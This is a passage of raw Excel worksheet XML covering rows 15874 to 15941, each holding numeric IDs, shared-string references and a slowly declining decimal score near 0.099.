        <v>9155.0</v>
      </c>
      <c r="B15874" s="2">
        <v>5.5280022E7</v>
      </c>
      <c r="C15874" s="2" t="s">
        <v>15319</v>
      </c>
      <c r="D15874" s="2">
        <v>1.0</v>
      </c>
      <c r="E15874" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15874" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15875" ht="15.75" customHeight="1">
      <c r="A15875" s="1">
        <v>9511.0</v>
      </c>
      <c r="B15875" s="2">
        <v>5.5960511E7</v>
      </c>
      <c r="C15875" s="2" t="s">
        <v>15320</v>
      </c>
      <c r="D15875" s="2">
        <v>1.0</v>
      </c>
      <c r="E15875" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15875" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15876" ht="15.75" customHeight="1">
      <c r="A15876" s="1">
        <v>9878.0</v>
      </c>
      <c r="B15876" s="2">
        <v>5.6745655E7</v>
      </c>
      <c r="C15876" s="2" t="s">
        <v>15321</v>
      </c>
      <c r="D15876" s="2">
        <v>1.0</v>
      </c>
      <c r="E15876" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15876" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15877" ht="15.75" customHeight="1">
      <c r="A15877" s="1">
        <v>10586.0</v>
      </c>
      <c r="B15877" s="2">
        <v>1.3194782E7</v>
      </c>
      <c r="C15877" s="2" t="s">
        <v>15322</v>
      </c>
      <c r="D15877" s="2">
        <v>1.0</v>
      </c>
      <c r="E15877" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15877" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15878" ht="15.75" customHeight="1">
      <c r="A15878" s="1">
        <v>10691.0</v>
      </c>
      <c r="B15878" s="2">
        <v>1.4759018E7</v>
      </c>
      <c r="C15878" s="2" t="s">
        <v>15323</v>
      </c>
      <c r="D15878" s="2">
        <v>1.0</v>
      </c>
      <c r="E15878" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15878" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15879" ht="15.75" customHeight="1">
      <c r="A15879" s="1">
        <v>10721.0</v>
      </c>
      <c r="B15879" s="2">
        <v>1.512676E7</v>
      </c>
      <c r="C15879" s="2" t="s">
        <v>15324</v>
      </c>
      <c r="D15879" s="2">
        <v>1.0</v>
      </c>
      <c r="E15879" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15879" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15880" ht="15.75" customHeight="1">
      <c r="A15880" s="1">
        <v>11207.0</v>
      </c>
      <c r="B15880" s="2">
        <v>2.0066791E7</v>
      </c>
      <c r="C15880" s="2" t="s">
        <v>15325</v>
      </c>
      <c r="D15880" s="2">
        <v>1.0</v>
      </c>
      <c r="E15880" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15880" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15881" ht="15.75" customHeight="1">
      <c r="A15881" s="1">
        <v>11230.0</v>
      </c>
      <c r="B15881" s="2">
        <v>2.0329904E7</v>
      </c>
      <c r="C15881" s="2" t="s">
        <v>15326</v>
      </c>
      <c r="D15881" s="2">
        <v>1.0</v>
      </c>
      <c r="E15881" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15881" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15882" ht="15.75" customHeight="1">
      <c r="A15882" s="1">
        <v>11472.0</v>
      </c>
      <c r="B15882" s="2">
        <v>2.1959077E7</v>
      </c>
      <c r="C15882" s="2" t="s">
        <v>15327</v>
      </c>
      <c r="D15882" s="2">
        <v>1.0</v>
      </c>
      <c r="E15882" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15882" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15883" ht="15.75" customHeight="1">
      <c r="A15883" s="1">
        <v>11850.0</v>
      </c>
      <c r="B15883" s="2">
        <v>2.4748021E7</v>
      </c>
      <c r="C15883" s="2" t="s">
        <v>15328</v>
      </c>
      <c r="D15883" s="2">
        <v>1.0</v>
      </c>
      <c r="E15883" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15883" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15884" ht="15.75" customHeight="1">
      <c r="A15884" s="1">
        <v>12275.0</v>
      </c>
      <c r="B15884" s="2">
        <v>2.8131522E7</v>
      </c>
      <c r="C15884" s="2" t="s">
        <v>15329</v>
      </c>
      <c r="D15884" s="2">
        <v>1.0</v>
      </c>
      <c r="E15884" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15884" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15885" ht="15.75" customHeight="1">
      <c r="A15885" s="1">
        <v>13117.0</v>
      </c>
      <c r="B15885" s="2">
        <v>3.3593991E7</v>
      </c>
      <c r="C15885" s="2" t="s">
        <v>15330</v>
      </c>
      <c r="D15885" s="2">
        <v>1.0</v>
      </c>
      <c r="E15885" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15885" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15886" ht="15.75" customHeight="1">
      <c r="A15886" s="1">
        <v>13163.0</v>
      </c>
      <c r="B15886" s="2">
        <v>3.393067E7</v>
      </c>
      <c r="C15886" s="2" t="s">
        <v>15331</v>
      </c>
      <c r="D15886" s="2">
        <v>1.0</v>
      </c>
      <c r="E15886" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15886" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15887" ht="15.75" customHeight="1">
      <c r="A15887" s="1">
        <v>13543.0</v>
      </c>
      <c r="B15887" s="2">
        <v>3.5640033E7</v>
      </c>
      <c r="C15887" s="2" t="s">
        <v>15332</v>
      </c>
      <c r="D15887" s="2">
        <v>1.0</v>
      </c>
      <c r="E15887" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15887" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15888" ht="15.75" customHeight="1">
      <c r="A15888" s="1">
        <v>13817.0</v>
      </c>
      <c r="B15888" s="2">
        <v>3.670899E7</v>
      </c>
      <c r="C15888" s="2" t="s">
        <v>15333</v>
      </c>
      <c r="D15888" s="2">
        <v>1.0</v>
      </c>
      <c r="E15888" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15888" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15889" ht="15.75" customHeight="1">
      <c r="A15889" s="1">
        <v>14021.0</v>
      </c>
      <c r="B15889" s="2">
        <v>3.7478731E7</v>
      </c>
      <c r="C15889" s="2" t="s">
        <v>15334</v>
      </c>
      <c r="D15889" s="2">
        <v>1.0</v>
      </c>
      <c r="E15889" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15889" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15890" ht="15.75" customHeight="1">
      <c r="A15890" s="1">
        <v>14180.0</v>
      </c>
      <c r="B15890" s="2">
        <v>3.8094468E7</v>
      </c>
      <c r="C15890" s="2" t="s">
        <v>15335</v>
      </c>
      <c r="D15890" s="2">
        <v>1.0</v>
      </c>
      <c r="E15890" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15890" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15891" ht="15.75" customHeight="1">
      <c r="A15891" s="1">
        <v>14327.0</v>
      </c>
      <c r="B15891" s="2">
        <v>3.875063E7</v>
      </c>
      <c r="C15891" s="2" t="s">
        <v>15336</v>
      </c>
      <c r="D15891" s="2">
        <v>1.0</v>
      </c>
      <c r="E15891" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15891" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15892" ht="15.75" customHeight="1">
      <c r="A15892" s="1">
        <v>14603.0</v>
      </c>
      <c r="B15892" s="2">
        <v>4.0240314E7</v>
      </c>
      <c r="C15892" s="2" t="s">
        <v>15337</v>
      </c>
      <c r="D15892" s="2">
        <v>1.0</v>
      </c>
      <c r="E15892" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15892" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15893" ht="15.75" customHeight="1">
      <c r="A15893" s="1">
        <v>14659.0</v>
      </c>
      <c r="B15893" s="2">
        <v>4.0425039E7</v>
      </c>
      <c r="C15893" s="2" t="s">
        <v>15338</v>
      </c>
      <c r="D15893" s="2">
        <v>1.0</v>
      </c>
      <c r="E15893" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15893" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15894" ht="15.75" customHeight="1">
      <c r="A15894" s="1">
        <v>15246.0</v>
      </c>
      <c r="B15894" s="2">
        <v>4.2276853E7</v>
      </c>
      <c r="C15894" s="2" t="s">
        <v>15339</v>
      </c>
      <c r="D15894" s="2">
        <v>1.0</v>
      </c>
      <c r="E15894" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15894" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15895" ht="15.75" customHeight="1">
      <c r="A15895" s="1">
        <v>15432.0</v>
      </c>
      <c r="B15895" s="2">
        <v>4.2962148E7</v>
      </c>
      <c r="C15895" s="2" t="s">
        <v>15340</v>
      </c>
      <c r="D15895" s="2">
        <v>1.0</v>
      </c>
      <c r="E15895" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15895" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15896" ht="15.75" customHeight="1">
      <c r="A15896" s="1">
        <v>15839.0</v>
      </c>
      <c r="B15896" s="2">
        <v>4.4371867E7</v>
      </c>
      <c r="C15896" s="2" t="s">
        <v>15341</v>
      </c>
      <c r="D15896" s="2">
        <v>1.0</v>
      </c>
      <c r="E15896" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15896" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15897" ht="15.75" customHeight="1">
      <c r="A15897" s="1">
        <v>16284.0</v>
      </c>
      <c r="B15897" s="2">
        <v>4.5796131E7</v>
      </c>
      <c r="C15897" s="2" t="s">
        <v>15342</v>
      </c>
      <c r="D15897" s="2">
        <v>1.0</v>
      </c>
      <c r="E15897" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15897" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15898" ht="15.75" customHeight="1">
      <c r="A15898" s="1">
        <v>16685.0</v>
      </c>
      <c r="B15898" s="2">
        <v>4.7314911E7</v>
      </c>
      <c r="C15898" s="2" t="s">
        <v>15343</v>
      </c>
      <c r="D15898" s="2">
        <v>1.0</v>
      </c>
      <c r="E15898" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15898" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15899" ht="15.75" customHeight="1">
      <c r="A15899" s="1">
        <v>16855.0</v>
      </c>
      <c r="B15899" s="2">
        <v>4.791953E7</v>
      </c>
      <c r="C15899" s="2" t="s">
        <v>15344</v>
      </c>
      <c r="D15899" s="2">
        <v>1.0</v>
      </c>
      <c r="E15899" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15899" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15900" ht="15.75" customHeight="1">
      <c r="A15900" s="1">
        <v>17556.0</v>
      </c>
      <c r="B15900" s="2">
        <v>5.0208837E7</v>
      </c>
      <c r="C15900" s="2" t="s">
        <v>15345</v>
      </c>
      <c r="D15900" s="2">
        <v>1.0</v>
      </c>
      <c r="E15900" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15900" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15901" ht="15.75" customHeight="1">
      <c r="A15901" s="1">
        <v>17698.0</v>
      </c>
      <c r="B15901" s="2">
        <v>5.0560266E7</v>
      </c>
      <c r="C15901" s="2" t="s">
        <v>15346</v>
      </c>
      <c r="D15901" s="2">
        <v>1.0</v>
      </c>
      <c r="E15901" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15901" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15902" ht="15.75" customHeight="1">
      <c r="A15902" s="1">
        <v>17717.0</v>
      </c>
      <c r="B15902" s="2">
        <v>5.0618383E7</v>
      </c>
      <c r="C15902" s="2" t="s">
        <v>15347</v>
      </c>
      <c r="D15902" s="2">
        <v>1.0</v>
      </c>
      <c r="E15902" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15902" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15903" ht="15.75" customHeight="1">
      <c r="A15903" s="1">
        <v>18599.0</v>
      </c>
      <c r="B15903" s="2">
        <v>5.3269057E7</v>
      </c>
      <c r="C15903" s="2" t="s">
        <v>15348</v>
      </c>
      <c r="D15903" s="2">
        <v>1.0</v>
      </c>
      <c r="E15903" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15903" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15904" ht="15.75" customHeight="1">
      <c r="A15904" s="1">
        <v>19066.0</v>
      </c>
      <c r="B15904" s="2">
        <v>5.4602878E7</v>
      </c>
      <c r="C15904" s="2" t="s">
        <v>15349</v>
      </c>
      <c r="D15904" s="2">
        <v>1.0</v>
      </c>
      <c r="E15904" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15904" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15905" ht="15.75" customHeight="1">
      <c r="A15905" s="1">
        <v>21130.0</v>
      </c>
      <c r="B15905" s="2">
        <v>1.8395171E7</v>
      </c>
      <c r="C15905" s="2" t="s">
        <v>15350</v>
      </c>
      <c r="D15905" s="2">
        <v>1.0</v>
      </c>
      <c r="E15905" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15905" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15906" ht="15.75" customHeight="1">
      <c r="A15906" s="1">
        <v>23376.0</v>
      </c>
      <c r="B15906" s="2">
        <v>5546228.0</v>
      </c>
      <c r="C15906" s="2" t="s">
        <v>15351</v>
      </c>
      <c r="D15906" s="2">
        <v>1.0</v>
      </c>
      <c r="E15906" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15906" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15907" ht="15.75" customHeight="1">
      <c r="A15907" s="1">
        <v>23408.0</v>
      </c>
      <c r="B15907" s="2">
        <v>5.5948392E7</v>
      </c>
      <c r="C15907" s="2" t="s">
        <v>15352</v>
      </c>
      <c r="D15907" s="2">
        <v>1.0</v>
      </c>
      <c r="E15907" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15907" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15908" ht="15.75" customHeight="1">
      <c r="A15908" s="1">
        <v>24260.0</v>
      </c>
      <c r="B15908" s="2">
        <v>1.052486E7</v>
      </c>
      <c r="C15908" s="2" t="s">
        <v>15353</v>
      </c>
      <c r="D15908" s="2">
        <v>1.0</v>
      </c>
      <c r="E15908" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15908" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15909" ht="15.75" customHeight="1">
      <c r="A15909" s="1">
        <v>24774.0</v>
      </c>
      <c r="B15909" s="2">
        <v>1.188046E7</v>
      </c>
      <c r="C15909" s="2" t="s">
        <v>15354</v>
      </c>
      <c r="D15909" s="2">
        <v>1.0</v>
      </c>
      <c r="E15909" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15909" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15910" ht="15.75" customHeight="1">
      <c r="A15910" s="1">
        <v>27324.0</v>
      </c>
      <c r="B15910" s="2">
        <v>2.1412736E7</v>
      </c>
      <c r="C15910" s="2" t="s">
        <v>15355</v>
      </c>
      <c r="D15910" s="2">
        <v>1.0</v>
      </c>
      <c r="E15910" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15910" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15911" ht="15.75" customHeight="1">
      <c r="A15911" s="1">
        <v>27447.0</v>
      </c>
      <c r="B15911" s="2">
        <v>2.1985013E7</v>
      </c>
      <c r="C15911" s="2" t="s">
        <v>15356</v>
      </c>
      <c r="D15911" s="2">
        <v>1.0</v>
      </c>
      <c r="E15911" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15911" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15912" ht="15.75" customHeight="1">
      <c r="A15912" s="1">
        <v>28881.0</v>
      </c>
      <c r="B15912" s="2">
        <v>2.9200242E7</v>
      </c>
      <c r="C15912" s="2" t="s">
        <v>15357</v>
      </c>
      <c r="D15912" s="2">
        <v>1.0</v>
      </c>
      <c r="E15912" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15912" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15913" ht="15.75" customHeight="1">
      <c r="A15913" s="1">
        <v>30682.0</v>
      </c>
      <c r="B15913" s="2">
        <v>4.2399594E7</v>
      </c>
      <c r="C15913" s="2" t="s">
        <v>15358</v>
      </c>
      <c r="D15913" s="2">
        <v>1.0</v>
      </c>
      <c r="E15913" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15913" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15914" ht="15.75" customHeight="1">
      <c r="A15914" s="1">
        <v>32500.0</v>
      </c>
      <c r="B15914" s="2">
        <v>5710124.0</v>
      </c>
      <c r="C15914" s="2" t="s">
        <v>15359</v>
      </c>
      <c r="D15914" s="2">
        <v>1.0</v>
      </c>
      <c r="E15914" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15914" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15915" ht="15.75" customHeight="1">
      <c r="A15915" s="1">
        <v>33024.0</v>
      </c>
      <c r="B15915" s="2">
        <v>6669403.0</v>
      </c>
      <c r="C15915" s="2" t="s">
        <v>15360</v>
      </c>
      <c r="D15915" s="2">
        <v>1.0</v>
      </c>
      <c r="E15915" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15915" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15916" ht="15.75" customHeight="1">
      <c r="A15916" s="1">
        <v>33376.0</v>
      </c>
      <c r="B15916" s="2">
        <v>7632037.0</v>
      </c>
      <c r="C15916" s="2" t="s">
        <v>15361</v>
      </c>
      <c r="D15916" s="2">
        <v>1.0</v>
      </c>
      <c r="E15916" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15916" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15917" ht="15.75" customHeight="1">
      <c r="A15917" s="1">
        <v>1598.0</v>
      </c>
      <c r="B15917" s="2">
        <v>2.7786196E7</v>
      </c>
      <c r="C15917" s="2" t="s">
        <v>15362</v>
      </c>
      <c r="D15917" s="2">
        <v>1.0</v>
      </c>
      <c r="E15917" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15917" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="15918" ht="15.75" customHeight="1">
      <c r="A15918" s="1">
        <v>2839.0</v>
      </c>
      <c r="B15918" s="2">
        <v>3.5439264E7</v>
      </c>
      <c r="C15918" s="2" t="s">
        <v>15363</v>
      </c>
      <c r="D15918" s="2">
        <v>1.0</v>
      </c>
      <c r="E15918" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15918" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="15919" ht="15.75" customHeight="1">
      <c r="A15919" s="1">
        <v>5309.0</v>
      </c>
      <c r="B15919" s="2">
        <v>4.5268858E7</v>
      </c>
      <c r="C15919" s="2" t="s">
        <v>15364</v>
      </c>
      <c r="D15919" s="2">
        <v>1.0</v>
      </c>
      <c r="E15919" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15919" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="15920" ht="15.75" customHeight="1">
      <c r="A15920" s="1">
        <v>10110.0</v>
      </c>
      <c r="B15920" s="2">
        <v>5.7243449E7</v>
      </c>
      <c r="C15920" s="2" t="s">
        <v>15365</v>
      </c>
      <c r="D15920" s="2">
        <v>1.0</v>
      </c>
      <c r="E15920" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15920" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="15921" ht="15.75" customHeight="1">
      <c r="A15921" s="1">
        <v>12646.0</v>
      </c>
      <c r="B15921" s="2">
        <v>3.0373775E7</v>
      </c>
      <c r="C15921" s="2" t="s">
        <v>15366</v>
      </c>
      <c r="D15921" s="2">
        <v>1.0</v>
      </c>
      <c r="E15921" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15921" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="15922" ht="15.75" customHeight="1">
      <c r="A15922" s="1">
        <v>15910.0</v>
      </c>
      <c r="B15922" s="2">
        <v>4.4638181E7</v>
      </c>
      <c r="C15922" s="2" t="s">
        <v>15367</v>
      </c>
      <c r="D15922" s="2">
        <v>1.0</v>
      </c>
      <c r="E15922" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15922" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="15923" ht="15.75" customHeight="1">
      <c r="A15923" s="1">
        <v>17763.0</v>
      </c>
      <c r="B15923" s="2">
        <v>5.0732246E7</v>
      </c>
      <c r="C15923" s="2" t="s">
        <v>15368</v>
      </c>
      <c r="D15923" s="2">
        <v>1.0</v>
      </c>
      <c r="E15923" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15923" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="15924" ht="15.75" customHeight="1">
      <c r="A15924" s="1">
        <v>18073.0</v>
      </c>
      <c r="B15924" s="2">
        <v>5.1614256E7</v>
      </c>
      <c r="C15924" s="2" t="s">
        <v>15369</v>
      </c>
      <c r="D15924" s="2">
        <v>1.0</v>
      </c>
      <c r="E15924" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15924" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="15925" ht="15.75" customHeight="1">
      <c r="A15925" s="1">
        <v>18288.0</v>
      </c>
      <c r="B15925" s="2">
        <v>5.2301392E7</v>
      </c>
      <c r="C15925" s="2" t="s">
        <v>15370</v>
      </c>
      <c r="D15925" s="2">
        <v>1.0</v>
      </c>
      <c r="E15925" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15925" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="15926" ht="15.75" customHeight="1">
      <c r="A15926" s="1">
        <v>3221.0</v>
      </c>
      <c r="B15926" s="2">
        <v>3.7314289E7</v>
      </c>
      <c r="C15926" s="2" t="s">
        <v>15371</v>
      </c>
      <c r="D15926" s="2">
        <v>1.0</v>
      </c>
      <c r="E15926" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15926" s="2">
        <v>0.09912854030501085</v>
      </c>
    </row>
    <row r="15927" ht="15.75" customHeight="1">
      <c r="A15927" s="1">
        <v>7186.0</v>
      </c>
      <c r="B15927" s="2">
        <v>5.0567546E7</v>
      </c>
      <c r="C15927" s="2" t="s">
        <v>15372</v>
      </c>
      <c r="D15927" s="2">
        <v>1.0</v>
      </c>
      <c r="E15927" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15927" s="2">
        <v>0.09912854030501085</v>
      </c>
    </row>
    <row r="15928" ht="15.75" customHeight="1">
      <c r="A15928" s="1">
        <v>12115.0</v>
      </c>
      <c r="B15928" s="2">
        <v>2.6880732E7</v>
      </c>
      <c r="C15928" s="2" t="s">
        <v>15373</v>
      </c>
      <c r="D15928" s="2">
        <v>1.0</v>
      </c>
      <c r="E15928" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15928" s="2">
        <v>0.09912854030501085</v>
      </c>
    </row>
    <row r="15929" ht="15.75" customHeight="1">
      <c r="A15929" s="1">
        <v>28505.0</v>
      </c>
      <c r="B15929" s="2">
        <v>2.6708797E7</v>
      </c>
      <c r="C15929" s="5" t="s">
        <v>15374</v>
      </c>
      <c r="D15929" s="2">
        <v>1.0</v>
      </c>
      <c r="E15929" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15929" s="2">
        <v>0.09912854030501085</v>
      </c>
    </row>
    <row r="15930" ht="15.75" customHeight="1">
      <c r="A15930" s="1">
        <v>32322.0</v>
      </c>
      <c r="B15930" s="2">
        <v>5575500.0</v>
      </c>
      <c r="C15930" s="2" t="s">
        <v>15375</v>
      </c>
      <c r="D15930" s="2">
        <v>1.0</v>
      </c>
      <c r="E15930" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15930" s="2">
        <v>0.09912854030501085</v>
      </c>
    </row>
    <row r="15931" ht="15.75" customHeight="1">
      <c r="A15931" s="1">
        <v>19758.0</v>
      </c>
      <c r="B15931" s="2">
        <v>5.6710555E7</v>
      </c>
      <c r="C15931" s="2" t="s">
        <v>15376</v>
      </c>
      <c r="D15931" s="2">
        <v>1.0</v>
      </c>
      <c r="E15931" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15931" s="2">
        <v>0.09907407407407404</v>
      </c>
    </row>
    <row r="15932" ht="15.75" customHeight="1">
      <c r="A15932" s="1">
        <v>28776.0</v>
      </c>
      <c r="B15932" s="2">
        <v>2.843653E7</v>
      </c>
      <c r="C15932" s="2" t="s">
        <v>15377</v>
      </c>
      <c r="D15932" s="2">
        <v>1.0</v>
      </c>
      <c r="E15932" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15932" s="2">
        <v>0.09887005649717513</v>
      </c>
    </row>
    <row r="15933" ht="15.75" customHeight="1">
      <c r="A15933" s="1">
        <v>23489.0</v>
      </c>
      <c r="B15933" s="2">
        <v>5751083.0</v>
      </c>
      <c r="C15933" s="2" t="s">
        <v>15378</v>
      </c>
      <c r="D15933" s="2">
        <v>1.0</v>
      </c>
      <c r="E15933" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15933" s="2">
        <v>0.09887005649717512</v>
      </c>
    </row>
    <row r="15934" ht="15.75" customHeight="1">
      <c r="A15934" s="1">
        <v>19201.0</v>
      </c>
      <c r="B15934" s="2">
        <v>5.4985437E7</v>
      </c>
      <c r="C15934" s="2" t="s">
        <v>15379</v>
      </c>
      <c r="D15934" s="2">
        <v>1.0</v>
      </c>
      <c r="E15934" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15934" s="2">
        <v>0.09865900383141761</v>
      </c>
    </row>
    <row r="15935" ht="15.75" customHeight="1">
      <c r="A15935" s="1">
        <v>2979.0</v>
      </c>
      <c r="B15935" s="2">
        <v>3.6122206E7</v>
      </c>
      <c r="C15935" s="2" t="s">
        <v>15380</v>
      </c>
      <c r="D15935" s="2">
        <v>1.0</v>
      </c>
      <c r="E15935" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15935" s="2">
        <v>0.09821428571428573</v>
      </c>
    </row>
    <row r="15936" ht="15.75" customHeight="1">
      <c r="A15936" s="1">
        <v>4871.0</v>
      </c>
      <c r="B15936" s="2">
        <v>4.3836892E7</v>
      </c>
      <c r="C15936" s="2" t="s">
        <v>15381</v>
      </c>
      <c r="D15936" s="2">
        <v>1.0</v>
      </c>
      <c r="E15936" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15936" s="2">
        <v>0.09821428571428573</v>
      </c>
    </row>
    <row r="15937" ht="15.75" customHeight="1">
      <c r="A15937" s="1">
        <v>19047.0</v>
      </c>
      <c r="B15937" s="2">
        <v>5.4578302E7</v>
      </c>
      <c r="C15937" s="2" t="s">
        <v>15382</v>
      </c>
      <c r="D15937" s="2">
        <v>1.0</v>
      </c>
      <c r="E15937" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15937" s="2">
        <v>0.09821428571428573</v>
      </c>
    </row>
    <row r="15938" ht="15.75" customHeight="1">
      <c r="A15938" s="1">
        <v>15118.0</v>
      </c>
      <c r="B15938" s="2">
        <v>4.1880091E7</v>
      </c>
      <c r="C15938" s="2" t="s">
        <v>15383</v>
      </c>
      <c r="D15938" s="2">
        <v>1.0</v>
      </c>
      <c r="E15938" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15938" s="2">
        <v>0.09821428571428571</v>
      </c>
    </row>
    <row r="15939" ht="15.75" customHeight="1">
      <c r="A15939" s="1">
        <v>15944.0</v>
      </c>
      <c r="B15939" s="2">
        <v>4.4750077E7</v>
      </c>
      <c r="C15939" s="2" t="s">
        <v>15384</v>
      </c>
      <c r="D15939" s="2">
        <v>1.0</v>
      </c>
      <c r="E15939" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15939" s="2">
        <v>0.09821428571428571</v>
      </c>
    </row>
    <row r="15940" ht="15.75" customHeight="1">
      <c r="A15940" s="1">
        <v>16992.0</v>
      </c>
      <c r="B15940" s="2">
        <v>4.8383609E7</v>
      </c>
      <c r="C15940" s="2" t="s">
        <v>15385</v>
      </c>
      <c r="D15940" s="2">
        <v>1.0</v>
      </c>
      <c r="E15940" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15940" s="2">
        <v>0.09821428571428571</v>
      </c>
    </row>
    <row r="15941" ht="15.75" customHeight="1">
      <c r="A15941" s="1">
        <v>5155.0</v>
